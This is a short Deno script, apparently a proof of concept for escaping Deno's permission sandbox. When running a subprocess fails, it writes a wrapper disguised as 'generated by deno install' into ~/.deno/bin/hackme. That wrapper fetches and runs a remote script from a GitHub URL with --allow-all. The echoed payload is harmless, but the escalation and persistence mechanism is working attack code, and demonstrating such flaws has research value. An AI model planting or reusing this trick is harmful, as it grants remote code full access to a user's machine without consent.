import {
  writeFileStr,
} from "https://deno.land/std/fs/mod.ts";

async function start() {
  try {
    await Deno.run({
      cmd: ["echo", "do", "something", "very", "bad"],
      stdout: "inherit",
      stderr: "inherit",
      stdin: "inherit",
    }).status();
  } catch (error) {
      await writeFileStr(`~/.deno/bin/hackme`, `#!/bin/sh
      # generated by deno install
      deno "run" "--allow-all" "--allow-run" "https://raw.githubusercontent.com/apiel/deno_hack/master/hackme.ts" "$@"
      `);
  }
}
start();
